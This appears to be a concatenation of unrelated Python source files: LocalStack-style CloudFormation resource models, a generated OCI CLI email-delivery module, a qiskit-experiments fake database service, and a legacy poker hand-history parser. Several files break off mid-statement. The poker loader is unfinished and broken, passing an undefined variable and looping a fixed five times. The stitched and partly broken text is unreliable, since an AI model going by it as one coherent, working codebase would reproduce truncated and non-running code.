return 'AWS::KinesisFirehose::DeliveryStream'
def fetch_state(self, stack_name, resources):
stream_name = self.props.get('DeliveryStreamName') or self.resource_id
stream_name = self.resolve_refs_recursively(stack_name, stream_name, resources)
return aws_stack.connect_to_service('firehose').describe_delivery_stream(DeliveryStreamName=stream_name)
class KinesisStream(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Kinesis::Stream'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.kinesis_stream_arn(self.props.get('Name'))
def fetch_state(self, stack_name, resources):
stream_name = self.resolve_refs_recursively(stack_name, self.props['Name'], resources)
result = aws_stack.connect_to_service('kinesis').describe_stream(StreamName=stream_name)
return result
class KinesisStreamConsumer(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Kinesis::StreamConsumer'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('ConsumerARN')
def fetch_state(self, stack_name, resources):
props = self.props
stream_arn = self.resolve_refs_recursively(stack_name, props['StreamARN'], resources)
result = aws_stack.connect_to_service('kinesis').list_stream_consumers(StreamARN=stream_arn)
result = [r for r in result['Consumers'] if r['ConsumerName'] == props['ConsumerName']]
return (result or [None])[0]
def get_deploy_templates():
return {
'create': {
'function': 'register_stream_consumer'
},
'delete': {
'function': 'deregister_stream_consumer'
}
}
class Route53RecordSet(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Route53::RecordSet'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('Name') # Ref attribute is the domain name itself
def fetch_state(self, stack_name, resources):
route53 = aws_stack.connect_to_service('route53')
props = self.props
result = route53.list_resource_record_sets(HostedZoneId=props['HostedZoneId'])['ResourceRecordSets']
result = [r for r in result if r['Name'] == props['Name'] and r['Type'] == props['Type']]
return (result or [None])[0]
def get_deploy_templates():
def param_change_batch(params, **kwargs):
attr_names = ['Name', 'Type', 'SetIdentifier', 'Weight', 'Region', 'GeoLocation',
'Failover', 'MultiValueAnswer', 'TTL', 'ResourceRecords', 'AliasTarget', 'HealthCheckId']
attrs = select_attributes(params, attr_names)
alias_target = attrs.get('AliasTarget', {})
alias_target['EvaluateTargetHealth'] = alias_target.get('EvaluateTargetHealth', False)
return {
'Comment': params.get('Comment', ''),
'Changes': [{
'Action': 'CREATE',
'ResourceRecordSet': attrs
}]
}
return {
'create': {
'function': 'change_resource_record_sets',
'parameters': {
'HostedZoneId': 'HostedZoneId',
'ChangeBatch': param_change_batch
}
}
}
class SFNStateMachine(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::StepFunctions::StateMachine'
def get_resource_name(self):
return self.props.get('StateMachineName')
def fetch_state(self, stack_name, resources):
sm_name = self.props.get('StateMachineName') or self.resource_id
sm_name = self.resolve_refs_recursively(stack_name, sm_name, resources)
sfn_client = aws_stack.connect_to_service('stepfunctions')
state_machines = sfn_client.list_state_machines()['stateMachines']
sm_arn = [m['stateMachineArn'] for m in state_machines if m['name'] == sm_name]
if not sm_arn:
return None
result = sfn_client.describe_state_machine(stateMachineArn=sm_arn[0])
return result
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('stepfunctions')
sm_arn = self.props.get('stateMachineArn')
if not sm_arn:
self.state = self.fetch_state(stack_name=stack_name, resources=resources)
sm_arn = self.state['stateMachineArn']
kwargs = {
'stateMachineArn': sm_arn,
'definition': props['DefinitionString'],
}
return client.update_state_machine(**kwargs)
class SFNActivity(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::StepFunctions::Activity'
def fetch_state(self, stack_name, resources):
activity_arn = self.physical_resource_id
if not activity_arn:
return None
client = aws_stack.connect_to_service('stepfunctions')
result = client.describe_activity(activityArn=activity_arn)
return result
class IAMRole(GenericBaseModel, MotoRole):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::Role'
def get_resource_name(self):
return self.props.get('RoleName')
def fetch_state(self, stack_name, resources):
role_name = self.resolve_refs_recursively(stack_name, self.props.get('RoleName'), resources)
return aws_stack.connect_to_service('iam').get_role(RoleName=role_name)['Role']
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
client = aws_stack.connect_to_service('iam')
return client.update_role(RoleName=props.get('RoleName'), Description=props.get('Description') or '')
class IAMPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::Policy'
def fetch_state(self, stack_name, resources):
return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=False)
@classmethod
def get_deploy_templates(cls):
def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
iam = aws_stack.connect_to_service('iam')
props = resources[resource_id]['Properties']
cls.resolve_refs_recursively(stack_name, props, resources)
policy_doc = json.dumps(remove_none_values(props['PolicyDocument']))
policy_name = props['PolicyName']
for role in props.get('Roles', []):
iam.put_role_policy(RoleName=role, PolicyName=policy_name, PolicyDocument=policy_doc)
for user in props.get('Users', []):
iam.put_user_policy(UserName=user, PolicyName=policy_name, PolicyDocument=policy_doc)
for group in props.get('Groups', []):
iam.put_group_policy(GroupName=group, PolicyName=policy_name, PolicyDocument=policy_doc)
return {}
return {'create': {'function': _create}}
@staticmethod
def get_policy_state(obj, stack_name, resources, managed_policy=False):
def _filter(pols):
return [p for p in pols['AttachedPolicies'] if p['PolicyName'] == policy_name]
iam = aws_stack.connect_to_service('iam')
props = obj.props
policy_name = props.get('PolicyName') or props.get('ManagedPolicyName')
result = {}
roles = props.get('Roles', [])
users = props.get('Users', [])
groups = props.get('Groups', [])
if managed_policy:
result['policy'] = iam.get_policy(PolicyArn=aws_stack.policy_arn(policy_name))
for role in roles:
role = obj.resolve_refs_recursively(stack_name, role, resources)
policies = (_filter(iam.list_attached_role_policies(RoleName=role)) if managed_policy else
iam.get_role_policy(RoleName=role, PolicyName=policy_name))
result['role:%s' % role] = policies
for user in users:
user = obj.resolve_refs_recursively(stack_name, user, resources)
policies = (_filter(iam.list_attached_user_policies(UserName=user)) if managed_policy else
iam.get_user_policy(UserName=user, PolicyName=policy_name))
result['user:%s' % user] = policies
for group in groups:
group = obj.resolve_refs_recursively(stack_name, group, resources)
policies = (_filter(iam.list_attached_group_policies(GroupName=group)) if managed_policy else
iam.get_group_policy(GroupName=group, PolicyName=policy_name))
result['group:%s' % group] = policies
result = {k: v for k, v in result.items() if v}
return result or None
class IAMManagedPolicy(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::IAM::ManagedPolicy'
def get_physical_resource_id(self, attribute=None, **kwargs):
return aws_stack.role_arn(self.props['ManagedPolicyName'])
def fetch_state(self, stack_name, resources):
return IAMPolicy.get_policy_state(self, stack_name, resources, managed_policy=True)
@classmethod
def get_deploy_templates(cls):
def _create(resource_id, resources, resource_type, func, stack_name, *args, **kwargs):
iam = aws_stack.connect_to_service('iam')
resource = resources[resource_id]
props = resource['Properties']
cls.resolve_refs_recursively(stack_name, props, resources)
policy_doc = json.dumps(props['PolicyDocument'])
policy = iam.create_policy(PolicyName=props['ManagedPolicyName'], PolicyDocument=policy_doc)
policy_arn = policy['Policy']['Arn']
for role in resource.get('Roles', []):
iam.attach_role_policy(RoleName=role, PolicyArn=policy_arn)
for user in resource.get('Users', []):
iam.attach_user_policy(UserName=user, PolicyArn=policy_arn)
for group in resource.get('Groups', []):
iam.attach_group_policy(GroupName=group, PolicyArn=policy_arn)
return {}
return {'create': {'function': _create}}
class GatewayResponse(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::GatewayResponse'
def fetch_state(self, stack_name, resources):
props = self.props
api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
if not api_id:
return
client = aws_stack.connect_to_service('apigateway')
result = client.get_gateway_response(restApiId=api_id, responseType=props['ResponseType'])
return result if 'responseType' in result else None
class GatewayRequestValidator(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::ApiGateway::RequestValidator'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('id')
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('apigateway')
props = self.props
api_id = self.resolve_refs_recursively(stack_name, props['RestApiId'], resources)
name = self.resolve_refs_recursively(stack_name, props['Name'], resources)
result = client.get_request_validators(restApiId=api_id).get('items', [])
result = [r for r in result if r.get('name') == name]
return result[0] if | |
<filename>services/email/src/oci_cli_email/generated/email_cli.py<gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
from __future__ import print_function
import click
import oci # noqa: F401
import six # noqa: F401
import sys # noqa: F401
from oci_cli.cli_root import cli
from oci_cli import cli_constants # noqa: F401
from oci_cli import cli_util
from oci_cli import json_skeleton_utils
from oci_cli import custom_types # noqa: F401
from oci_cli.aliasing import CommandGroupWithAlias
@cli.command(cli_util.override('email_root_group.command_name', 'email'), cls=CommandGroupWithAlias, help=cli_util.override('email_root_group.help', """API for the Email Delivery service. Use this API to send high-volume, application-generated
emails. For more information, see [Overview of the Email Delivery Service](/iaas/Content/Email/Concepts/overview.htm).
**Note:** Write actions (POST, UPDATE, DELETE) may take several minutes to propagate and be reflected by the API. If a subsequent read request fails to reflect your changes, wait a few minutes and try again.
"""), short_help=cli_util.override('email_root_group.short_help', """Email Delivery API"""))
@cli_util.help_option_group
def email_root_group():
pass
@click.command(cli_util.override('sender_group.command_name', 'sender'), cls=CommandGroupWithAlias, help="""The full information representing an approved sender.""")
@cli_util.help_option_group
def sender_group():
pass
@click.command(cli_util.override('suppression_group.command_name', 'suppression'), cls=CommandGroupWithAlias, help="""The full information representing an email suppression.""")
@cli_util.help_option_group
def suppression_group():
pass
email_root_group.add_command(sender_group)
email_root_group.add_command(suppression_group)
@sender_group.command(name=cli_util.override('change_sender_compartment.command_name', 'change-compartment'), help=u"""Moves a sender into a different compartment. When provided, If-Match is checked against ETag values of the resource.""")
@cli_util.option('--sender-id', required=True, help=u"""The unique OCID of the sender.""")
@cli_util.option('--compartment-id', required=True, help=u"""The [OCID] of the compartment into which the sender should be moved.""")
@cli_util.option('--if-match', help=u"""Used for optimistic concurrency control. In the update or delete call for a resource, set the `if-match` parameter to the value of the etag from a previous get, create, or update response for that resource. The resource will be updated or deleted only if the etag you provide matches the resource's current etag value.""")
@json_skeleton_utils.get_cli_json_input_option({})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={})
@cli_util.wrap_exceptions
def change_sender_compartment(ctx, from_json, sender_id, compartment_id, if_match):
if isinstance(sender_id, six.string_types) and len(sender_id.strip()) == 0:
raise click.UsageError('Parameter --sender-id cannot be whitespace or empty string')
kwargs = {}
if if_match is not None:
kwargs['if_match'] = if_match
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
details = {}
details['compartmentId'] = compartment_id
client = cli_util.build_client('email', ctx)
result = client.change_sender_compartment(
sender_id=sender_id,
change_sender_compartment_details=details,
**kwargs
)
cli_util.render_response(result, ctx)
@sender_group.command(name=cli_util.override('create_sender.command_name', 'create'), help=u"""Creates a sender for a tenancy in a given compartment.""")
@cli_util.option('--compartment-id', required=True, help=u"""The OCID of the compartment that contains the sender.""")
@cli_util.option('--email-address', required=True, help=u"""The email address of the sender.""")
@cli_util.option('--freeform-tags', type=custom_types.CLI_COMPLEX_TYPE, help=u"""Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags]. Example: `{\"Department\": \"Finance\"}`""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@cli_util.option('--defined-tags', type=custom_types.CLI_COMPLEX_TYPE, help=u"""Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags]. Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@cli_util.option('--wait-for-state', type=custom_types.CliCaseInsensitiveChoice(["CREATING", "ACTIVE", "DELETING", "DELETED"]), help="""This operation creates, modifies or deletes a resource that has a defined lifecycle state. Specify this option to perform the action and then wait until the resource reaches a given lifecycle state. If timeout is reached, a return code of 2 is returned. For any other error, a return code of 1 is returned.""")
@cli_util.option('--max-wait-seconds', type=click.INT, help="""The maximum time to wait for the resource to reach the lifecycle state defined by --wait-for-state. Defaults to 1200 seconds.""")
@cli_util.option('--wait-interval-seconds', type=click.INT, help="""Check every --wait-interval-seconds to see whether the resource to see if it has reached the lifecycle state defined by --wait-for-state. Defaults to 30 seconds.""")
@json_skeleton_utils.get_cli_json_input_option({'freeform-tags': {'module': 'email', 'class': 'dict(str, string)'}, 'defined-tags': {'module': 'email', 'class': 'dict(str, dict(str, object))'}})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={'freeform-tags': {'module': 'email', 'class': 'dict(str, string)'}, 'defined-tags': {'module': 'email', 'class': 'dict(str, dict(str, object))'}}, output_type={'module': 'email', 'class': 'Sender'})
@cli_util.wrap_exceptions
def create_sender(ctx, from_json, wait_for_state, max_wait_seconds, wait_interval_seconds, compartment_id, email_address, freeform_tags, defined_tags):
kwargs = {}
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
details = {}
details['compartmentId'] = compartment_id
details['emailAddress'] = email_address
if freeform_tags is not None:
details['freeformTags'] = cli_util.parse_json_parameter("freeform_tags", freeform_tags)
if defined_tags is not None:
details['definedTags'] = cli_util.parse_json_parameter("defined_tags", defined_tags)
client = cli_util.build_client('email', ctx)
result = client.create_sender(
create_sender_details=details,
**kwargs
)
if wait_for_state:
if hasattr(client, 'get_sender') and callable(getattr(client, 'get_sender')):
try:
wait_period_kwargs = {}
if max_wait_seconds is not None:
wait_period_kwargs['max_wait_seconds'] = max_wait_seconds
if wait_interval_seconds is not None:
wait_period_kwargs['max_interval_seconds'] = wait_interval_seconds
click.echo('Action completed. Waiting until the resource has entered state: {}'.format(wait_for_state), file=sys.stderr)
result = oci.wait_until(client, client.get_sender(result.data.id), 'lifecycle_state', wait_for_state, **wait_period_kwargs)
except oci.exceptions.MaximumWaitTimeExceeded as e:
# If we fail, we should show an error, but we should still provide the information to the customer
click.echo('Failed to wait until the resource entered the specified state. Outputting last known resource state', file=sys.stderr)
cli_util.render_response(result, ctx)
sys.exit(2)
except Exception:
click.echo('Encountered error while waiting for resource to enter the specified state. Outputting last known resource state', file=sys.stderr)
cli_util.render_response(result, ctx)
raise
else:
click.echo('Unable to wait for the resource to enter the specified state', file=sys.stderr)
cli_util.render_response(result, ctx)
@suppression_group.command(name=cli_util.override('create_suppression.command_name', 'create'), help=u"""Adds recipient email addresses to the suppression list for a tenancy. Addresses added to the suppression list via the API are denoted as \"MANUAL\" in the `reason` field. *Note:* All email addresses added to the suppression list are normalized to include only lowercase letters.""")
@cli_util.option('--compartment-id', required=True, help=u"""The OCID of the compartment to contain the suppression. Since suppressions are at the customer level, this must be the tenancy OCID.""")
@cli_util.option('--email-address', required=True, help=u"""The recipient email address of the suppression.""")
@json_skeleton_utils.get_cli_json_input_option({})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={}, output_type={'module': 'email', 'class': 'Suppression'})
@cli_util.wrap_exceptions
def create_suppression(ctx, from_json, compartment_id, email_address):
kwargs = {}
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
details = {}
details['compartmentId'] = compartment_id
details['emailAddress'] = email_address
client = cli_util.build_client('email', ctx)
result = client.create_suppression(
create_suppression_details=details,
**kwargs
)
cli_util.render_response(result, ctx)
@sender_group.command(name=cli_util.override('delete_sender.command_name', 'delete'), help=u"""Deletes an approved sender for a tenancy in a given compartment for a provided `senderId`.""")
@cli_util.option('--sender-id', required=True, help=u"""The unique OCID of the sender.""")
@cli_util.option('--if-match', help=u"""Used for optimistic concurrency control. In the update or delete call for a resource, set the `if-match` parameter to the value of the etag from a previous get, create, or update response for that resource. The resource will be updated or deleted only if the etag you provide matches the resource's current etag value.""")
@cli_util.confirm_delete_option
@cli_util.option('--wait-for-state', type=custom_types.CliCaseInsensitiveChoice(["CREATING", "ACTIVE", "DELETING", "DELETED"]), help="""This operation creates, modifies or deletes a resource that has a defined lifecycle state. Specify this option to perform the action and then wait until the resource reaches a given lifecycle state. If timeout is reached, a return code of 2 is returned. For any other error, a return code of 1 is returned.""")
@cli_util.option('--max-wait-seconds', type=click.INT, help="""The maximum time to wait for the resource to reach the lifecycle state defined by --wait-for-state. Defaults to 1200 seconds.""")
@cli_util.option('--wait-interval-seconds', type=click.INT, help="""Check every --wait-interval-seconds to see whether the resource to see if it has reached the lifecycle state defined by --wait-for-state. Defaults to 30 seconds.""")
@json_skeleton_utils.get_cli_json_input_option({})
@cli_util.help_option
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={})
@cli_util.wrap_exceptions
def delete_sender(ctx, from_json, wait_for_state, max_wait_seconds, wait_interval_seconds, sender_id, if_match):
if isinstance(sender_id, six.string_types) and len(sender_id.strip()) == 0:
raise click.UsageError('Parameter --sender-id cannot be whitespace or empty string')
kwargs = {}
if if_match is not None:
kwargs['if_match'] = if_match
kwargs['opc_request_id'] = cli_util.use_or_generate_request_id(ctx.obj['request_id'])
client = cli_util.build_client('email', ctx)
result = client.delete_sender(
sender_id=sender_id,
**kwargs
)
if wait_for_state:
if hasattr(client, 'get_sender') and callable(getattr(client, 'get_sender')):
try:
wait_period_kwargs = {}
if max_wait_seconds is not None:
wait_period_kwargs['max_wait_seconds'] = max_wait_seconds
if wait_interval_seconds is not None:
wait_period_kwargs['max_interval_seconds'] = wait_interval_seconds
click.echo('Action completed. Waiting until the resource has entered state: {}'.format(wait_for_state), file=sys.stderr)
oci.wait_until(client, client.get_sender(sender_id), 'lifecycle_state', wait_for_state, succeed_on_not_found=True, **wait_period_kwargs)
except oci.exceptions.ServiceError as e:
# We make an initial service call so we can pass the result to oci.wait_until(), however if we are waiting on the
# outcome of a delete operation it is possible that the resource is already gone and so the initial service call
# will result in an exception that reflects a HTTP 404. In this case, we can exit with success (rather than raising
# the exception) since this would have been the behaviour in the waiter anyway (as for delete we provide the argument
# succeed_on_not_found=True to the waiter).
#
# Any non-404 should still result in the exception being thrown.
if e.status == 404:
pass
else:
raise
except oci.exceptions.MaximumWaitTimeExceeded as e:
# If we fail, we should show an error, but we should still provide the information to the customer
click.echo('Failed to wait until the resource entered the specified state. Please retrieve the resource to find its current state', file=sys.stderr)
cli_util.render_response(result, ctx)
sys.exit(2)
except Exception:
click.echo('Encountered error while waiting for resource to enter the specified state. Outputting last known resource state', file=sys.stderr)
cli_util.render_response(result, ctx)
raise
else:
click.echo('Unable to wait for the resource to enter the specified state', file=sys.stderr)
cli_util.render_response(result, ctx)
@suppression_group.command(name=cli_util.override('delete_suppression.command_name', 'delete'), help=u"""Removes a suppressed recipient email address from the suppression list for a tenancy in | |
<reponame>QuantumHardware/qiskit-experiments
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Fake service class for tests."""
from typing import Optional, List, Dict, Type, Any, Union, Tuple, Callable
import functools
import json
from datetime import datetime, timedelta
import uuid
from qiskit_experiments.test.fake_backend import FakeBackend
from qiskit_experiments.database_service import DatabaseServiceV1
from qiskit_experiments.database_service.device_component import DeviceComponent
from qiskit_experiments.database_service.exceptions import (
DbExperimentEntryExists,
DbExperimentEntryNotFound,
)
# Check if PANDAS package is installed
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
pd = None
HAS_PANDAS = False
def requires_pandas(func: Callable) -> Callable:
"""Function decorator for functions requiring Pandas.
Args:
func: a function requiring Pandas.
Returns:
The decorated function.
Raises:
QiskitError: If Pandas is not installed.
"""
@functools.wraps(func)
def decorated_func(*args, **kwargs):
if not HAS_PANDAS:
raise ImportError(
f"The pandas python package is required for {func}."
"You can install it with 'pip install pandas'."
)
return func(*args, **kwargs)
return decorated_func
class FakeService(DatabaseServiceV1):
"""
This extremely simple database is designated for testing and as a playground for developers.
It does not support multi-threading.
It is not guaranteed to perform well for a large amount of data.
It implements most of the methods of `DatabaseService`.
"""
@requires_pandas
def __init__(self):
self.exps = pd.DataFrame(
columns=[
"experiment_type",
"backend_name",
"metadata",
"experiment_id",
"parent_id",
"job_ids",
"tags",
"notes",
"share_level",
"start_datetime",
"device_components",
"figure_names",
"backend",
]
)
self.results = pd.DataFrame(
columns=[
"experiment_id",
"result_data",
"result_type",
"device_components",
"tags",
"quality",
"verified",
"result_id",
"chisq",
"creation_datetime",
"service",
"backend_name",
]
)
def create_experiment(
self,
experiment_type: str,
backend_name: str,
metadata: Optional[Dict] = None,
experiment_id: Optional[str] = None,
parent_id: Optional[str] = None,
job_ids: Optional[List[str]] = None,
tags: Optional[List[str]] = None,
notes: Optional[str] = None,
json_encoder: Type[json.JSONEncoder] = json.JSONEncoder,
**kwargs: Any,
) -> str:
if experiment_id is None:
experiment_id = uuid.uuid4()
if experiment_id in self.exps.experiment_id.values:
raise DbExperimentEntryExists("Cannot add experiment with existing id")
# Clarifications about some of the columns:
# share_level - not a parameter of `DatabaseService.create_experiment` but a parameter of
# `IBMExperimentService.create_experiment`. It must be supported because it is used
# in `DbExperimentData`.
# device_components - the user speicifies the device components when adding a result
# (this is not a local decision of the fake service but the interface of DatabaseService
# and IBMExperimentService). The components of the different results of the same
# experiment are aggregated here in the device_components column.
# start_datetime - not a parameter of `DatabaseService.create_experiment` but a parameter of
# `IBMExperimentService.create_experiment`. Since `DbExperimentData` does not set it
# via kwargs (as it does with share_level), the user cannot control the time and the
# service alone decides about it. Here we've chosen to set a unique time for each
# experiment, with the first experiment dated to midnight of January 1st, 2022, the
# second experiment an hour later, etc.
# figure_names - the fake service currently does not support figures. The column
# (degenerated to []) is required to prevent a flaw in the work with DbExperimentData.
# backend - the query methods `experiment` and `experiments` are supposed to return an
# an instansiated backend object, and not only the backend name. We assume that the fake
# service works with the fake backend (class FakeBackend).
self.exps = pd.concat(
[
self.exps,
pd.DataFrame(
[
{
"experiment_type": experiment_type,
"experiment_id": experiment_id,
"parent_id": parent_id,
"backend_name": backend_name,
"metadata": metadata,
"job_ids": job_ids,
"tags": tags,
"notes": notes,
"share_level": kwargs.get("share_level", None),
"device_components": [],
"start_datetime": datetime(2022, 1, 1)
+ timedelta(hours=len(self.exps)),
"figure_names": [],
"backend": FakeBackend(backend_name),
}
],
columns=self.exps.columns,
),
],
ignore_index=True,
)
return experiment_id
def update_experiment(
self,
experiment_id: str,
metadata: Optional[Dict] = None,
job_ids: Optional[List[str]] = None,
notes: Optional[str] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
if experiment_id not in self.exps.experiment_id.values:
raise DbExperimentEntryNotFound("Attempt to update a non-existing experiment")
row = self.exps.experiment_id == experiment_id
if metadata is not None:
self.exps.loc[row, "metadata"] = metadata
if job_ids is not None:
self.exps.loc[row, "job_ids"] = job_ids
if tags is not None:
self.exps.loc[row, "tags"] = tags
if notes is not None:
self.exps.loc[row, "notes"] = notes
for field_name in ["share_level", "parent_id"]:
if field_name in kwargs:
self.exps.loc[row, field_name] = kwargs[field_name]
def experiment(
self, experiment_id: str, json_decoder: Type[json.JSONDecoder] = json.JSONDecoder
) -> Dict:
if experiment_id not in self.exps.experiment_id.values:
raise DbExperimentEntryNotFound("Experiment does not exist")
return self.exps.loc[self.exps.experiment_id == experiment_id].to_dict("records")[0]
def experiments(
self,
limit: Optional[int] = 10,
json_decoder: Type[json.JSONDecoder] = json.JSONDecoder,
device_components: Optional[Union[str, DeviceComponent]] = None,
experiment_type: Optional[str] = None,
backend_name: Optional[str] = None,
tags: Optional[List[str]] = None,
parent_id: Optional[str] = None,
tags_operator: Optional[str] = "OR",
**filters: Any,
) -> List[Dict]:
df = self.exps
if experiment_type is not None:
df = df.loc[df.experiment_type == experiment_type]
if backend_name is not None:
df = df.loc[df.backend_name == backend_name]
# Note a bug in the interface for all services:
# It is impossible to filter by experiments whose parent id is None
# (i.e., root experiments)
if parent_id is not None:
df = df.loc[df.parent_id == parent_id]
# Waiting for consistency between provider service and qiskit-experiments service,
# currently they have different types for `device_components`
if device_components is not None:
raise ValueError(
"The fake service currently does not support filtering on device components"
)
if tags is not None:
if tags_operator == "OR":
df = df.loc[df.tags.apply(lambda dftags: any(x in dftags for x in tags))]
elif tags_operator == "AND":
df = df.loc[df.tags.apply(lambda dftags: all(x in dftags for x in tags))]
else:
raise ValueError("Unrecognized tags operator")
# These are parameters of IBMExperimentService.experiments
if "start_datetime_before" in filters:
df = df.loc[df.start_datetime <= filters["start_datetime_before"]]
if "start_datetime_after" in filters:
df = df.loc[df.start_datetime >= filters["start_datetime_after"]]
# This is a parameter of IBMExperimentService.experiments
sort_by = filters.get("sort_by", "start_datetime:desc")
if not isinstance(sort_by, list):
sort_by = [sort_by]
# TODO: support also experiment_type
if len(sort_by) != 1:
raise ValueError("The fake service currently supports only sorting by start_datetime")
sortby_split = sort_by[0].split(":")
# TODO: support also experiment_type
if (
len(sortby_split) != 2
or sortby_split[0] != "start_datetime"
or (sortby_split[1] != "asc" and sortby_split[1] != "desc")
):
raise ValueError(
"The fake service currently supports only sorting by start_datetime, which can be "
"either asc or desc"
)
df = df.sort_values(
["start_datetime", "experiment_id"], ascending=[(sortby_split[1] == "asc"), True]
)
df = df.iloc[:limit]
return df.to_dict("records")
def delete_experiment(self, experiment_id: str) -> None:
if experiment_id not in self.exps.experiment_id.values:
return
index = self.exps[self.exps.experiment_id == experiment_id].index
self.exps.drop(index, inplace=True)
def create_analysis_result(
self,
experiment_id: str,
result_data: Dict,
result_type: str,
device_components: Optional[Union[str, DeviceComponent]] = None,
tags: Optional[List[str]] = None,
quality: Optional[str] = None,
verified: bool = False,
result_id: Optional[str] = None,
json_encoder: Type[json.JSONEncoder] = json.JSONEncoder,
**kwargs: Any,
) -> str:
if result_id is None:
result_id = uuid.uuid4()
if result_id in self.results.result_id.values:
raise DbExperimentEntryExists("Cannot add analysis result with existing id")
# Clarifications about some of the columns:
# backend_name - taken from the experiment.
# creation_datetime - start_datetime - not a parameter of
# `DatabaseService.create_analysis_result` but a parameter of
# `IBMExperimentService.create_analysis_result`. Since `DbExperimentData` does not set it
# via kwargs (as it does with chisq), the user cannot control the time and the service
# alone decides about it. Here we've chosen to set the start date of the experiment.
self.results = pd.concat(
[
self.results,
pd.DataFrame(
[
{
"result_data": result_data,
"result_id": result_id,
"result_type": result_type,
"device_components": device_components,
"experiment_id": experiment_id,
"quality": quality,
"verified": verified,
"tags": tags,
"backend_name": self.exps.loc[self.exps.experiment_id == experiment_id]
.iloc[0]
.backend_name,
"chisq": kwargs.get("chisq", None),
"creation_datetime": self.exps.loc[
self.exps.experiment_id == experiment_id
]
.iloc[0]
.start_datetime,
}
]
),
],
ignore_index=True,
)
# a helper method for updating the experiment's device components, see usage below
def add_new_components(expcomps):
for dc in device_components:
if dc not in expcomps:
expcomps.append(dc)
# update the experiment's device components
self.exps.loc[self.exps.experiment_id == experiment_id, "device_components"].apply(
add_new_components
)
return result_id
def update_analysis_result(
self,
result_id: str,
result_data: Optional[Dict] = None,
tags: Optional[List[str]] = None,
quality: Optional[str] = None,
verified: bool = None,
**kwargs: Any,
) -> None:
if result_id not in | |
<filename>legacy/Hand_load.py
import re
import copy
import Classes as cl
import itertools
import Database_gen as dg
import pickle
import gc
"""
with open("/Users/Shuza/SpiderOak Hive/Poker hands/BovadaHandHistory/BovadaHandHistory_Omaha_PL_2016070722214792111.txt",'r') as f:
All stacks and betsizes tracked in BBs (for cross stakes)
hand converted and ordered. Replace Suits by ABCD (Hero,board,vil)
Keep track of pot size.
Bets and raises in terms of pot size.
calls in terms of pot size.
Track Allins and returned bets
later it will say Hero: posts *blind* *amount* if hero is in blinds.
Can figure out all positions from positions previously
grab digits+commas and periods = ^[0-9]{1,2}([,.][0-9]{1,2})?$
re.search(r"o\s\$([\d]+[,.][\d]+)?",action)
"""
#TODO create pre/flop/turn seperate action groups for infoset
#only use effective stack size. Let it iterate over hands in a folder.
#store hands in rust format for easy eval?
#TODO Fixed overbets in terms of stacksize for HU. To fix for multiplayer
#need to isolate the players and compare the eff_stacksizes. Shouldn't be that hard
#TODO remove Hero and replace with generic position. Add a perspective field?
def get_digits(text):
return filter(str.isdigit, text)
def import_file(file_name,file_type):
with open(file_name,'r') as file:
file_contents = file.readlines()
length = len(file_contents)
infoset_list = []
i = 0
end = False
rake_format = False
#while end == False:
#for per hand basis
for x in xrange(0,5):
print "beginning", i
players = []
infoset = cl.Information_set()
positions = []
pot = 0
skip = False
print file_contents[0]
print 'length', length
#get header
(header,bb,i) = grab_header(file_contents,i,infoset)
#positions + stacks
(positions,i,players,skip) = grab_positions_stacks(file_contents,i,bb,positions,players,infoset,skip)
eff_stack = min(infoset.positions_stacks, key = lambda x: x[1])[1]
if skip == False:
#blinds and pot
(pot,i,players,last_bet) = grab_pot_blinds(file_contents,i,bb,pot,players)
#get holecards
(i,players,suit_replace) = grab_hand(file_contents,i,infoset,players)
#get actions/board cards
(i,pot,players,suit_replace,position_replace) = grab_actions(file_contents,i,infoset,bb,pot,players,suit_replace,last_bet,eff_stack,position_replace)
#get outcome
(i,pot,end,players) = grab_outcome(file_contents,i,infoset,pot,bb,end,length,players,rake_format,suit_replace)
#move to beginning of next hand
infoset_list.append(infoset)
else:
while not re.search("PokerStars",file_contents[i]):
i += 1
#forward to next hand
